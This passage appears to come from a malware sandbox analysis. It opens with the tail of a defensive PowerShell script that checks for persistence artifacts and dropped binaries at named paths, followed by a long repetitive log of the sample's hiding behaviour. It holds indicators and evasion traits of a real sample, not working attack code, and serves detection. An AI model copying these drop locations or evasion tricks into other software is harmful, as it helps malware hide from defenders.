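    # 3. Dropped binaries from the report. SecurityHealthSystray.exe legitimately lives in
    #    System32, so for that path the Authenticode status is the signal, not mere presence.
    $dropped = @(
        'C:\Recovery\VTixufCejPQZEvXiB.exe',
        'C:\Program Files (x86)\AutoIt3\VTixufCejPQZEvXiB.exe',
        'C:\Program Files (x86)\Java\VTixufCejPQZEvXiB.exe',
        'C:\Program Files\Windows Defender\en-GB\conhost.exe',
        'C:\Users\Public\AccountPictures\winlogon.exe',
        'C:\Windows\System32\SecurityHealthSystray.exe'
    )
    foreach ($path in $dropped) {
        if (-not (Test-Path -LiteralPath $path)) { continue }
        $sig  = Get-AuthenticodeSignature -FilePath $path
        $hash = (Get-FileHash -LiteralPath $path -Algorithm SHA256).Hash
        $findings.Add("file: $path | signature=$($sig.Status) | sha256=$hash")
    }

    # 4. Processes launched via Win32_Process::Create are children of WmiPrvSE.exe.
    $wmiHostPids = @(Get-CimInstance Win32_Process -Filter "Name = 'WmiPrvSE.exe'" |
                     Select-Object -ExpandProperty ProcessId)
    if ($wmiHostPids.Count -gt 0) {
        Get-CimInstance Win32_Process |
            Where-Object { $wmiHostPids -contains $_.ParentProcessId } |
            ForEach-Object { $findings.Add("wmi-spawned pid $($_.ProcessId): $($_.CommandLine)") }
    }

    return $findings
}

$result = @(Get-PersistenceFindings)
if ($result.Count -eq 0) { 'No matching persistence artifacts found.' } else { $result }
```

The script reports rather than remediates: a Shell value other than explorer.exe, any of the four Run names in either hive, an existing dropped path with its signature status and SHA-256, and any process parented by WmiPrvSE.exe. The Winlogon Shell value in particular should be restored to explorer.exe only after the binary it points at has been collected, since that path is the clearest indicator of where the final payload lives.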

                            Hooking and other Techniques for Hiding and Protection

                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Java\VTixufCejPQZEvXiB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Java\VTixufCejPQZEvXiB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Java\VTixufCejPQZEvXiB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Java\VTixufCejPQZEvXiB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Java\VTixufCejPQZEvXiB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Java\VTixufCejPQZEvXiB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Java\VTixufCejPQZEvXiB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Java\VTixufCejPQZEvXiB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Java\VTixufCejPQZEvXiB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Java\VTixufCejPQZEvXiB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Java\VTixufCejPQZEvXiB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Java\VTixufCejPQZEvXiB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Java\VTixufCejPQZEvXiB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Java\VTixufCejPQZEvXiB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Java\VTixufCejPQZEvXiB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Java\VTixufCejPQZEvXiB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\Public\AccountPictures\winlogon.exe; Process information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
